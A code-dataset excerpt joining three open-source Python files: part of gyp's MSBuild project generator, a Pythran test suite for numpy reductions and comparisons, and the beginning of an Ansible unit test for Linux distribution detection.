# postbuild = configuration.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = configuration.get('msvs_precompiled_header')
# Add the information to the appropriate tool
# TODO(jeanluc) We could optimize and generate these settings only if
# the corresponding files are found, e.g. don't generate ResourceCompile
# if you don't have any resources.
_ToolAppend(msbuild_settings, 'ClCompile',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'AdditionalIncludeDirectories', resource_include_dirs)
  # Add in libraries; note that even for empty libraries, we want this
  # set, to prevent inheriting default libraries from the environment.
_ToolSetOrAppend(msbuild_settings, 'Link', 'AdditionalDependencies',
libraries)
_ToolAppend(msbuild_settings, 'Link', 'AdditionalLibraryDirectories',
library_dirs)
if out_file:
_ToolAppend(msbuild_settings, msbuild_tool, 'OutputFile', out_file,
only_if_unset=True)
if target_ext:
_ToolAppend(msbuild_settings, msbuild_tool, 'TargetExt', target_ext,
only_if_unset=True)
# Add defines.
_ToolAppend(msbuild_settings, 'ClCompile',
'PreprocessorDefinitions', defines)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'PreprocessorDefinitions', defines)
# Add disabled warnings.
_ToolAppend(msbuild_settings, 'ClCompile',
'DisableSpecificWarnings', disabled_warnings)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(msbuild_settings, 'ClCompile', 'PrecompiledHeader', 'Use')
_ToolAppend(msbuild_settings, 'ClCompile',
'PrecompiledHeaderFile', precompiled_header)
_ToolAppend(msbuild_settings, 'ClCompile',
'ForcedIncludeFiles', [precompiled_header])
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(msbuild_settings, '', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(msbuild_settings, 'Link', 'ModuleDefinitionFile', def_file)
configuration['finalized_msbuild_settings'] = msbuild_settings
def _GetValueFormattedForMSBuild(tool_name, name, value):
if type(value) == list:
    # For some settings, VS2010 does not automatically extend the settings
# TODO(jeanluc) Is this what we want?
if name in ['AdditionalIncludeDirectories',
'AdditionalLibraryDirectories',
'AdditionalOptions',
'DelayLoadDLLs',
'DisableSpecificWarnings',
'PreprocessorDefinitions']:
value.append('%%(%s)' % name)
# For most tools, entries in a list should be separated with ';' but some
# settings use a space. Check for those first.
exceptions = {
'ClCompile': ['AdditionalOptions'],
'Link': ['AdditionalOptions'],
'Lib': ['AdditionalOptions']}
if tool_name in exceptions and name in exceptions[tool_name]:
char = ' '
else:
char = ';'
formatted_value = char.join(
[MSVSSettings.ConvertVCMacrosToMSBuild(i) for i in value])
else:
formatted_value = MSVSSettings.ConvertVCMacrosToMSBuild(value)
return formatted_value
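# Illustrative examples for _GetValueFormattedForMSBuild (added comment, not
# part of the original gyp source):
#   _GetValueFormattedForMSBuild('ClCompile', 'PreprocessorDefinitions',
#                                ['FOO', 'BAR'])
#     -> 'FOO;BAR;%(PreprocessorDefinitions)'
#   _GetValueFormattedForMSBuild('Link', 'AdditionalOptions', ['/MAP'])
#     -> '/MAP %(AdditionalOptions)'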
def _VerifySourcesExist(sources, root_dir):
"""Verifies that all source files exist on disk.
Checks that all regular source files, i.e. not created at run time,
  exist on disk. Missing files cause needless recompilation but otherwise no
  visible errors.
Arguments:
sources: A recursive list of Filter/file names.
root_dir: The root directory for the relative path names.
Returns:
A list of source files that cannot be found on disk.
"""
missing_sources = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
missing_sources.extend(_VerifySourcesExist(source.contents, root_dir))
else:
if '$' not in source:
full_path = os.path.join(root_dir, source)
if not os.path.exists(full_path):
missing_sources.append(full_path)
return missing_sources
def _GetMSBuildSources(spec, sources, exclusions, extension_to_rule_name,
actions_spec, sources_handled_by_action, list_excluded):
groups = ['none', 'midl', 'include', 'compile', 'resource', 'rule']
grouped_sources = {}
for g in groups:
grouped_sources[g] = []
_AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action, list_excluded)
sources = []
for g in groups:
if grouped_sources[g]:
sources.append(['ItemGroup'] + grouped_sources[g])
if actions_spec:
sources.append(['ItemGroup'] + actions_spec)
return sources
def _AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action,
list_excluded):
extensions_excluded_from_precompile = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
_AddSources2(spec, source.contents, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action,
list_excluded)
else:
if not source in sources_handled_by_action:
detail = []
excluded_configurations = exclusions.get(source, [])
if len(excluded_configurations) == len(spec['configurations']):
detail.append(['ExcludedFromBuild', 'true'])
else:
for config_name, configuration in sorted(excluded_configurations):
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['ExcludedFromBuild',
{'Condition': condition},
'true'])
# Add precompile if needed
for config_name, configuration in spec['configurations'].iteritems():
precompiled_source = configuration.get('msvs_precompiled_source', '')
if precompiled_source != '':
precompiled_source = _FixPath(precompiled_source)
if not extensions_excluded_from_precompile:
# If the precompiled header is generated by a C source, we must
# not try to use it for C++ sources, and vice versa.
basename, extension = os.path.splitext(precompiled_source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
if precompiled_source == source:
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['PrecompiledHeader',
{'Condition': condition},
'Create'
])
else:
# Turn off precompiled header usage for source files of a
# different type than the file that generated the
# precompiled header.
for extension in extensions_excluded_from_precompile:
if source.endswith(extension):
detail.append(['PrecompiledHeader', ''])
detail.append(['ForcedIncludeFiles', ''])
group, element = _MapFileToMsBuildSourceType(source,
extension_to_rule_name)
grouped_sources[group].append([element, {'Include': source}] + detail)
def _GetMSBuildProjectReferences(project):
references = []
if project.dependencies:
group = ['ItemGroup']
for dependency in project.dependencies:
guid = dependency.guid
project_dir = os.path.split(project.path)[0]
relative_path = gyp.common.RelativePath(dependency.path, project_dir)
project_ref = ['ProjectReference',
{'Include': relative_path},
['Project', guid],
['ReferenceOutputAssembly', 'false']
]
for config in dependency.spec.get('configurations', {}).itervalues():
# If it's disabled in any config, turn it off in the reference.
if config.get('msvs_2010_disable_uldi_when_referenced', 0):
project_ref.append(['UseLibraryDependencyInputs', 'false'])
break
group.append(project_ref)
references.append(group)
return references
def _GenerateMSBuildProject(project, options, version, generator_flags):
spec = project.spec
configurations = spec['configurations']
project_dir, project_file_name = os.path.split(project.path)
gyp.common.EnsureDirExists(project.path)
# Prepare list of sources and excluded sources.
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
gyp_file)
# Add rules.
actions_to_add = {}
props_files_of_rules = set()
targets_files_of_rules = set()
extension_to_rule_name = {}
list_excluded = generator_flags.get('msvs_list_excluded_files', True)
# Don't generate rules if we are using an external builder like ninja.
if not spec.get('msvs_external_builder'):
_GenerateRulesForMSBuild(project_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name)
else:
rules = spec.get('rules', [])
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(spec, options,
project_dir, sources,
excluded_sources,
list_excluded))
# Don't add actions if we are using an external builder like ninja.
if not spec.get('msvs_external_builder'):
_AddActions(actions_to_add, spec, project.build_file)
_AddCopies(actions_to_add, spec)
# NOTE: this stanza must appear after all actions have been decided.
  # Don't exclude sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
actions_spec, sources_handled_by_action = _GenerateActionsForMSBuild(
spec, actions_to_add)
_GenerateMSBuildFiltersFile(project.path + '.filters', sources,
extension_to_rule_name)
missing_sources = _VerifySourcesExist(sources, project_dir)
for configuration in configurations.itervalues():
_FinalizeMSBuildSettings(spec, configuration)
# Add attributes to root element
import_default_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.Default.props'}]]
import_cpp_props_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.props'}]]
import_cpp_targets_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.targets'}]]
macro_section = [['PropertyGroup', {'Label': 'UserMacros'}]]
content = [
'Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003',
'ToolsVersion': version.ProjectVersion(),
'DefaultTargets': 'Build'
}]
content += _GetMSBuildProjectConfigurations(configurations)
content += _GetMSBuildGlobalProperties(spec, project.guid, project_file_name)
content += import_default_section
content += _GetMSBuildConfigurationDetails(spec, project.build_file)
content += _GetMSBuildLocalProperties(project.msbuild_toolset)
content += import_cpp_props_section
content += _GetMSBuildExtensions(props_files_of_rules)
content += _GetMSBuildPropertySheets(configurations)
content += macro_section
content += _GetMSBuildConfigurationGlobalProperties(spec, configurations,
project.build_file)
content += _GetMSBuildToolSettingsSections(spec, configurations)
content += _GetMSBuildSources(
spec, sources, exclusions, extension_to_rule_name, actions_spec,
sources_handled_by_action, list_excluded)
content += _GetMSBuildProjectReferences(project)
content += import_cpp_targets_section
content += _GetMSBuildExtensionTargets(targets_files_of_rules)
if spec.get('msvs_external_builder'):
content += _GetMSBuildExternalBuilderTargets(spec)
# TODO(jeanluc) File a bug to get rid of runas. We had in MSVS:
# has_run_as = _WriteMSVSUserFile(project.path, version, spec)
easy_xml.WriteXmlIfChanged(content, project.path, pretty=True, win32=True)
return missing_sources
def _GetMSBuildExternalBuilderTargets(spec):
"""Return a list of MSBuild targets for external builders.
Right now, only "Build" and "Clean" targets are generated.
Arguments:
spec: The gyp target spec.
Returns:
List of MSBuild 'Target' specs.
"""
build_cmd = _BuildCommandLineForRuleRaw(
spec, spec['msvs_external_builder_build_cmd'],
False, False, False, False)
build_target = ['Target', {'Name': 'Build'}]
build_target.append(['Exec', {'Command': build_cmd}])
clean_cmd = _BuildCommandLineForRuleRaw(
spec, spec['msvs_external_builder_clean_cmd'],
False, False, False, False)
clean_target = ['Target', {'Name': 'Clean'}]
clean_target.append(['Exec', {'Command': clean_cmd}])
return [build_target, clean_target]
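# Illustrative output for _GetMSBuildExternalBuilderTargets (added comment,
# not part of the original gyp source): with the default ninja commands set up
# by _InitNinjaFlavor, the returned targets are roughly
#   [['Target', {'Name': 'Build'},
#     ['Exec', {'Command': 'ninja.exe -C $(OutDir) $(ProjectName)'}]],
#    ['Target', {'Name': 'Clean'},
#     ['Exec', {'Command': 'ninja.exe -C $(OutDir) -t clean $(ProjectName)'}]]]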
def _GetMSBuildExtensions(props_files_of_rules):
extensions = ['ImportGroup', {'Label': 'ExtensionSettings'}]
for props_file in props_files_of_rules:
extensions.append(['Import', {'Project': props_file}])
return [extensions]
def _GetMSBuildExtensionTargets(targets_files_of_rules):
targets_node = ['ImportGroup', {'Label': 'ExtensionTargets'}]
for targets_file in sorted(targets_files_of_rules):
targets_node.append(['Import', {'Project': targets_file}])
return [targets_node]
def _GenerateActionsForMSBuild(spec, actions_to_add):
  """Add the actions accumulated in actions_to_add, merging as needed.
Arguments:
spec: the target project dict
actions_to_add: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
Returns:
A pair of (action specification, the sources handled by this action).
"""
sources_handled_by_action = OrderedSet()
actions_spec = []
for primary_input, actions in actions_to_add.iteritems():
inputs = OrderedSet()
outputs = OrderedSet()
descriptions = []
commands = []
for action in actions:
inputs.update(OrderedSet(action['inputs']))
outputs.update(OrderedSet(action['outputs']))
descriptions.append(action['description'])
cmd = action['command']
# For most actions, add 'call' so that actions that invoke batch files
# return and continue executing. msbuild_use_call provides a way to
# disable this but I have not seen any adverse effect from doing that
# for everything.
if action.get('msbuild_use_call', True):
cmd = 'call ' + cmd
commands.append(cmd)
# Add the custom build action for one input file.
description = ', and also '.join(descriptions)
# We can't join the commands simply with && because the command line will
# get too long. See also _AddActions: cygwin's setup_env mustn't be called
# for every invocation or the command that sets the PATH will grow too
# long.
command = (
'\r\nif %errorlevel% neq 0 exit /b %errorlevel%\r\n'.join(commands))
_AddMSBuildAction(spec,
primary_input,
inputs,
outputs,
command,
description,
sources_handled_by_action,
actions_spec)
return actions_spec, sources_handled_by_action
def _AddMSBuildAction(spec, primary_input, inputs, outputs, cmd, description,
sources_handled_by_action, actions_spec):
command = MSVSSettings.ConvertVCMacrosToMSBuild(cmd)
primary_input = _FixPath(primary_input)
inputs_array = _FixPaths(inputs)
outputs_array = _FixPaths(outputs)
additional_inputs = ';'.join([i for i in inputs_array
if i != primary_input])
outputs = ';'.join(outputs_array)
sources_handled_by_action.add(primary_input)
action_spec = ['CustomBuild', {'Include': primary_input}]
action_spec.extend(
# TODO(jeanluc) 'Document' for all or just if as_sources?
[['FileType', 'Document'],
['Command', command],
['Message', description],
['Outputs', outputs]
])
if additional_inputs:
action_spec.append(['AdditionalInputs', additional_inputs])
actions_spec.append(action_spec)
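# Illustrative output shape for _AddMSBuildAction (added comment, not part of
# the original gyp source): a single action whose primary input is 'gen.py'
# and whose only output is 'out.c' appends roughly
#   ['CustomBuild', {'Include': 'gen.py'},
#    ['FileType', 'Document'],
#    ['Command', 'call python gen.py'],
#    ['Message', '<description>'],
#    ['Outputs', 'out.c']]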
| bsd-3-clause |
pombredanne/pythran | pythran/tests/test_numpy_func1.py | 3 | 14718 | import unittest
from test_env import TestEnv
import numpy
@TestEnv.module
class TestNumpyFunc1(TestEnv):
def test_sum_bool2(self):
self.run_test("def np_sum_bool2(a): return a.sum()", numpy.ones(10,dtype=bool).reshape(2,5), np_sum_bool2=[numpy.array([[bool]])])
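    # Note (added; not part of the original test file): each run_test call is
    # expected to compile the given code string with Pythran, run both the
    # compiled extension and the plain CPython version on the supplied
    # arguments, and compare their results; the keyword argument maps the
    # exported function name to its argument type specification.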
def test_sum_expr(self):
self.run_test("def np_sum_expr(a):\n from numpy import ones\n return (a + ones(10)).sum()", numpy.arange(10), np_sum_expr=[numpy.array([int])])
def test_sum2_(self):
self.run_test("def np_sum2_(a): return a.sum()", numpy.arange(10).reshape(2,5), np_sum2_=[numpy.array([[int]])])
def test_sum3_(self):
self.run_test("def np_sum3_(a): return a.sum(1)", numpy.arange(10).reshape(2,5), np_sum3_=[numpy.array([[int]])])
def test_sum4_(self):
self.run_test("def np_sum4_(a): return a.sum(0)", numpy.arange(10).reshape(2,5), np_sum4_=[numpy.array([[int]])])
def test_sum5_(self):
self.run_test("def np_sum5_(a): return a.sum(0)", numpy.arange(10), np_sum5_=[numpy.array([int])])
def test_sum6_(self):
self.run_test("def np_sum6_(a): return a.sum(0)", numpy.arange(12).reshape(2,3,2), np_sum6_=[numpy.array([[[int]]])])
def test_sum7_(self):
self.run_test("def np_sum7_(a): return a.sum(1)", numpy.arange(12).reshape(2,3,2), np_sum7_=[numpy.array([[[int]]])])
def test_sum8_(self):
self.run_test("def np_sum8_(a): return a.sum(2)", numpy.arange(12).reshape(2,3,2), np_sum8_=[numpy.array([[[int]]])])
def test_sum9_(self):
self.run_test("def np_sum9_(a): import numpy as np ; return np.sum(a*a,0)", numpy.arange(12).reshape(2,3,2), np_sum9_=[numpy.array([[[int]]])])
def test_sum10_(self):
self.run_test("def np_sum10_(a): import numpy as np ; return np.sum(a-a,1)", numpy.arange(12).reshape(2,3,2), np_sum10_=[numpy.array([[[int]]])])
def test_sum11_(self):
self.run_test("def np_sum11_(a): import numpy as np ; return np.sum(a+a,2)", numpy.arange(12).reshape(2,3,2), np_sum11_=[numpy.array([[[int]]])])
def test_prod_(self):
""" Check prod function for numpy array. """
self.run_test("""
def np_prod_(a):
return a.prod()""",
numpy.arange(10),
np_prod_=[numpy.array([int])])
def test_prod_bool(self):
self.run_test("def np_prod_bool(a): return (a > 2).prod()", numpy.arange(10), np_prod_bool=[numpy.array([int])])
def test_prod_bool2(self):
self.run_test("def np_prod_bool2(a): return a.prod()", numpy.ones(10,dtype=bool).reshape(2,5), np_prod_bool2=[numpy.array([[bool]])])
def test_prod2_(self):
self.run_test("def np_prod2_(a): return a.prod()", numpy.arange(10).reshape(2,5), np_prod2_=[numpy.array([[int]])])
def test_prod3_(self):
self.run_test("def np_prod3_(a): return a.prod(1)", numpy.arange(10).reshape(2,5), np_prod3_=[numpy.array([[int]])])
def test_prod4_(self):
self.run_test("def np_prod4_(a): return a.prod(0)", numpy.arange(10).reshape(2,5), np_prod4_=[numpy.array([[int]])])
def test_prod5_(self):
self.run_test("def np_prod5_(a): return a.prod(0)", numpy.arange(10), np_prod5_=[numpy.array([int])])
def test_prod6_(self):
self.run_test("def np_prod6_(a): return a.prod(0)", numpy.arange(12).reshape(2,3,2), np_prod6_=[numpy.array([[[int]]])])
def test_prod7_(self):
self.run_test("def np_prod7_(a): return a.prod(1)", numpy.arange(12).reshape(2,3,2), np_prod7_=[numpy.array([[[int]]])])
def test_prod8_(self):
self.run_test("def np_prod8_(a): return a.prod(2)", numpy.arange(12).reshape(2,3,2), np_prod8_=[numpy.array([[[int]]])])
def test_prod9_(self):
self.run_test("def np_prod9_(a): import numpy as np ; return np.prod(a*a,0)", numpy.arange(12).reshape(2,3,2), np_prod9_=[numpy.array([[[int]]])])
def test_prod10_(self):
self.run_test("def np_prod10_(a): import numpy as np ; return np.prod(a-a,1)", numpy.arange(12).reshape(2,3,2), np_prod10_=[numpy.array([[[int]]])])
def test_prod11_(self):
self.run_test("def np_prod11_(a): import numpy as np ; return np.prod(a+a,2)", numpy.arange(12).reshape(2,3,2), np_prod11_=[numpy.array([[[int]]])])
def test_prod_expr(self):
self.run_test("def np_prod_expr(a):\n from numpy import ones\n return (a + ones(10)).prod()", numpy.arange(10), np_prod_expr=[numpy.array([int])])
def test_amin_amax(self):
self.run_test("def np_amin_amax(a):\n from numpy import amin,amax\n return amin(a), amax(a)",numpy.arange(10), np_amin_amax=[numpy.array([int])])
def test_min_(self):
self.run_test("def np_min_(a): return a.min()", numpy.arange(10), np_min_=[numpy.array([int])])
def test_min1_(self):
self.run_test("def np_min1_(a): return (a+a).min()", numpy.arange(10), np_min1_=[numpy.array([int])])
def test_min2_(self):
self.run_test("def np_min2_(a): return a.min()", numpy.arange(10).reshape(2,5), np_min2_=[numpy.array([[int]])])
def test_min3_(self):
self.run_test("def np_min3_(a): return a.min(1)", numpy.arange(10).reshape(2,5), np_min3_=[numpy.array([[int]])])
def test_min4_(self):
self.run_test("def np_min4_(a): return a.min(0)", numpy.arange(10).reshape(2,5), np_min4_=[numpy.array([[int]])])
def test_min5_(self):
self.run_test("def np_min5_(a): return a.min(0)", numpy.arange(10), np_min5_=[numpy.array([int])])
def test_min6_(self):
self.run_test("def np_min6_(a): return a.min(1)", numpy.arange(30).reshape(2,5,3), np_min6_=[numpy.array([[[int]]])])
def test_min7_(self):
self.run_test("def np_min7_(a): return (a+a).min(1)", numpy.arange(30).reshape(2,5,3), np_min7_=[numpy.array([[[int]]])])
def test_max_(self):
self.run_test("def np_max_(a): return a.max()", numpy.arange(10), np_max_=[numpy.array([int])])
def test_max1_(self):
self.run_test("def np_max1_(a): return (a+a).max()", numpy.arange(10), np_max1_=[numpy.array([int])])
def test_max2_(self):
self.run_test("def np_max2_(a): return a.max()", numpy.arange(10).reshape(2,5), np_max2_=[numpy.array([[int]])])
def test_max3_(self):
self.run_test("def np_max3_(a): return a.max(1)", numpy.arange(10).reshape(2,5), np_max3_=[numpy.array([[int]])])
def test_max4_(self):
self.run_test("def np_max4_(a): return a.max(0)", numpy.arange(10).reshape(2,5), np_max4_=[numpy.array([[int]])])
def test_max5_(self):
self.run_test("def np_max5_(a): return a.max(0)", numpy.arange(10), np_max5_=[numpy.array([int])])
def test_max6_(self):
self.run_test("def np_max6_(a): return a.max(1)", numpy.arange(30).reshape(2,5,3), np_max6_=[numpy.array([[[int]]])])
def test_max7_(self):
self.run_test("def np_max7_(a): return (a+a).max(1)", numpy.arange(30).reshape(2,5,3), np_max7_=[numpy.array([[[int]]])])
def test_all_(self):
self.run_test("def np_all_(a): return a.all()", numpy.arange(10), np_all_=[numpy.array([int])])
def test_all2_(self):
self.run_test("def np_all2_(a): return a.all()", numpy.ones(10).reshape(2,5), np_all2_=[numpy.array([[float]])])
def test_all3_(self):
self.run_test("def np_all3_(a): return a.all(1)", numpy.arange(10).reshape(2,5), np_all3_=[numpy.array([[int]])])
def test_all4_(self):
self.run_test("def np_all4_(a): return a.all(0)", numpy.ones(10).reshape(2,5), np_all4_=[numpy.array([[float]])])
def test_all5_(self):
self.run_test("def np_all5_(a): return a.all(0)", numpy.arange(10), np_all5_=[numpy.array([int])])
def test_all6_(self):
self.run_test("def np_all6_(a): return a.all().all()", numpy.arange(10), np_all6_=[numpy.array([int])])
def test_all7_(self):
self.run_test("def np_all7_(a): return a.all().all(0)", numpy.arange(10), np_all7_=[numpy.array([int])])
def test_transpose_(self):
self.run_test("def np_transpose_(a): return a.transpose()", numpy.arange(24).reshape(2,3,4), np_transpose_=[numpy.array([[[int]]])])
def test_transpose_expr(self):
self.run_test("def np_transpose_expr(a): return (a + a).transpose()", numpy.ones(24).reshape(2,3,4), np_transpose_expr=[numpy.array([[[float]]])])
def test_transpose2_(self):
self.run_test("def np_transpose2_(a): return a.transpose((2,0,1))", numpy.arange(24).reshape(2,3,4), np_transpose2_=[numpy.array([[[int]]])])
def test_alen0(self):
self.run_test("def np_alen0(a): from numpy import alen ; return alen(a)", numpy.ones((5,6)), np_alen0=[numpy.array([[float]])])
def test_alen1(self):
self.run_test("def np_alen1(a): from numpy import alen ; return alen(-a)", numpy.ones((5,6)), np_alen1=[numpy.array([[float]])])
def test_allclose0(self):
self.run_test("def np_allclose0(a): from numpy import allclose ; return allclose([1e10,1e-7], a)", [1.00001e10,1e-8], np_allclose0=[[float]])
def test_allclose1(self):
self.run_test("def np_allclose1(a): from numpy import allclose; return allclose([1e10,1e-8], +a)", numpy.array([1.00001e10,1e-9]), np_allclose1=[numpy.array([float])])
def test_allclose2(self):
self.run_test("def np_allclose2(a): from numpy import array, allclose; return allclose(array([1e10,1e-8]), a)", numpy.array([1.00001e10,1e-9]), np_allclose2=[numpy.array([float])])
def test_allclose3(self):
self.run_test("def np_allclose3(a): from numpy import allclose; return allclose(a, a)", [1.0, numpy.nan], np_allclose3=[[float]])
def test_allclose4(self):
""" Check allclose behavior with infinity values. """
self.run_test("""
def np_allclose4(a):
from numpy import array, allclose
return allclose(array([-float('inf'), float('inf'),
-float('inf')]), a)""",
numpy.array([float("inf"), float("inf"), -float('inf')]),
np_allclose4=[numpy.array([float])])
def test_alltrue0(self):
self.run_test("def np_alltrue0(b): from numpy import alltrue ; return alltrue(b)", numpy.array([True, False, True, True]), np_alltrue0=[numpy.array([bool])])
def test_alltrue1(self):
self.run_test("def np_alltrue1(a): from numpy import alltrue ; return alltrue(a >= 5)", numpy.array([1, 5, 2, 7]), np_alltrue1=[numpy.array([int])])
def test_count_nonzero0(self):
self.run_test("def np_count_nonzero0(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([[-1, -5, -2, 7], [9, 3, 0, -0]]), np_count_nonzero0=[numpy.array([[int]])])
def test_count_nonzero1(self):
self.run_test("def np_count_nonzero1(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([-1, 5, -2, 0]), np_count_nonzero1=[numpy.array([int])])
def test_count_nonzero2(self):
self.run_test("def np_count_nonzero2(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([-1., 0., -2., -1e-20]), np_count_nonzero2=[numpy.array([float])])
def test_count_nonzero3(self):
self.run_test("def np_count_nonzero3(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([[0, 2, 0., 4 + 1j], [0.+0.j, 0.+4j, 1.+0j, 1j]]), np_count_nonzero3=[numpy.array([[complex]])])
def test_count_nonzero4(self):
self.run_test("def np_count_nonzero4(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([[True, False], [False, False]]), np_count_nonzero4=[numpy.array([[bool]])])
def test_count_nonzero5(self):
self.run_test("def np_count_nonzero5(a): from numpy import count_nonzero; return count_nonzero(a*2)",
numpy.array([[-1, -5, -2, 7], [9, 3, 0, -0]]), np_count_nonzero5=[numpy.array([[int]])])
def test_isclose0(self):
self.run_test("def np_isclose0(u): from numpy import isclose; return isclose(u, u)",
numpy.array([[-1.01, 1e-10+1e-11, -0, 7., float('NaN')], [-1.0, 1e-10, 0., 7., float('NaN')]]),
np_isclose0=[numpy.array([[float]])])
def test_isclose1(self):
self.run_test("def np_isclose1(u, v): from numpy import isclose; return isclose(u, v, 1e-19, 1e-16)",
numpy.array([-1.01, 1e-10+1e-11, float("inf"), 7.]),
numpy.array([9., 1e-10, float("inf"), float('NaN')]),
np_isclose1=[numpy.array([float]), numpy.array([float])])
def test_isclose2(self):
self.run_test("def np_isclose2(u,v): from numpy import isclose; return isclose(u, v, 1e-16, 1e-19)",
numpy.array([-1.01, 1e-10+1e-11, -0, 7., float('NaN')]),
numpy.array([-1., 1e-10+2e-11, -0, 7.1, float('NaN')]),
np_isclose2=[numpy.array([float]), numpy.array([float])])
def test_isclose3(self):
self.run_test("def np_isclose3(u): from numpy import isclose; return isclose(u, u)",
numpy.array([9.+3j, 1e-10, 1.1j, float('NaN')]),
np_isclose3=[numpy.array([complex])])
def test_isclose4(self):
self.run_test("def np_isclose4(u,v): from numpy import isclose; return isclose(u, v)",
numpy.array([True, False, True, True, False]),
numpy.array([True, False, False, True, True]),
np_isclose4=[numpy.array([bool]), numpy.array([bool])])
@unittest.expectedFailure
def test_isclose5(self):
self.run_test("def np_isclose5(u,v): from numpy import isclose; return isclose(u, v)",
1e-10,
1e-10+1e-11,
np_isclose5=[float, float])
@unittest.expectedFailure
def test_isclose6(self):
self.run_test("def np_isclose6(u, v): from numpy import isclose; return isclose(u, v, 1e-19, 1e-16)",
numpy.array([[-float("inf"), 1e-10+1e-11, -0, 7.],[9., 1e-10, 0., float('NaN')]]),
numpy.array([float("inf"), 1e-10, 0., float('NaN')]),
np_isclose6=[numpy.array([[float]]), numpy.array([float])])
@unittest.expectedFailure
def test_isclose7(self):
self.run_test("def np_isclose7(u, v): from numpy import isclose; return isclose(u, v, 1e-19, 1e-16)",
numpy.array([9., 1e-10, 0., float('NaN')]),
numpy.array([[-1.01, 1e-10+1e-11, -0, 7.],[9., 1e-10, 0., float('NaN')]]),
np_isclose7=[numpy.array([float]), numpy.array([[float]])])
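
# A minimal standalone sketch (separate from the run_test harness above) of
# the numpy tolerance semantics these cases rely on: with the default
# rtol=1e-05 and atol=1e-08, 1e10 vs 1.00001e10 is "close" while 1e-7 vs 1e-8
# is not, and NaN never compares as close under the allclose/isclose defaults.
if __name__ == '__main__':
    import numpy
    print(numpy.allclose([1e10, 1e-7], [1.00001e10, 1e-8]))    # False
    print(numpy.allclose([1e10, 1e-8], [1.00001e10, 1e-9]))    # True
    print(numpy.allclose([1.0, numpy.nan], [1.0, numpy.nan]))  # False
    print(numpy.isclose([1e10, 1e-8], [1.00001e10, 1e-9]))     # [ True  True]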
| bsd-3-clause |
thaumos/ansible | test/units/module_utils/common/test_sys_info.py | 45 | 5231 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2016 Toshio Kuratomi <[email protected]>
# (c) 2017-2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
from units.compat.mock import patch
from ansible.module_utils.six.moves import builtins
# Functions being tested
from ansible.module_utils.common.sys_info import get_distribution
from ansible.module_utils.common.sys_info import get_distribution_version
from ansible.module_utils.common.sys_info import get_platform_subclass
realimport = builtins.__import__
@pytest.fixture
def platform_linux(mocker):
mocker.patch('platform.system', return_value='Linux')
#
# get_distribution tests
#
def test_get_distribution_not_linux():
"""If it's not Linux, then it has no distribution"""
with patch('platform.system', return_value='Foo'):
assert get_distribution() is None
@pytest.mark.usefixtures("platform_linux")
class TestGetDistribution:
"""Tests for get_distribution that have to find something"""
def test_distro_known(self):
with patch('ansible.module_utils.distro.id', return_value="alpine"):
assert get_distribution() == "Alpine"
with patch('ansible.module_utils.distro.id', return_value="arch"):
assert get_distribution() == "Arch"
with patch('ansible.module_utils.distro.id', return_value="centos"):
assert get_distribution() == "Centos"
with patch('ansible.module_utils.distro.id', return_value="clear-linux-os"):
assert get_distribution() == "Clear-linux-os"
with patch('ansible.module_utils.distro.id', return_value="coreos"):
assert get_distribution() == "Coreos"
with patch('ansible.module_utils.distro.id', return_value="debian"):
assert get_distribution() == "Debian"
with patch('ansible.module_utils.distro.id', return_value="linuxmint"):
assert get_distribution() == "Linuxmint"
with patch('ansible.module_utils.distro.id', return_value="opensuse"):
assert get_distribution() == "Opensuse"
with patch('ansible.module_utils.distro.id', return_value="oracle"):
assert get_distribution() == "Oracle"
with patch('ansible.module_utils.distro.id', return_value="raspian"):
assert get_distribution() == "Raspian"
with patch('ansible.module_utils.distro.id', return_value="rhel"):
assert get_distribution() == "Redhat"
with patch('ansible.module_utils.distro.id', return_value="ubuntu"):
assert get_distribution() == "Ubuntu"
with patch('ansible.module_utils.distro.id', return_value="virtuozzo"):
assert get_distribution() == "Virtuozzo"
with patch('ansible.module_utils.distro.id', return_value="foo"):
assert get_distribution() == "Foo"
def test_distro_unknown(self):
with patch('ansible.module_utils.distro.id', return_value=""):
assert get_distribution() == "OtherLinux"
def test_distro_amazon_linux_short(self):
with patch('ansible.module_utils.distro.id', return_value="amzn"):
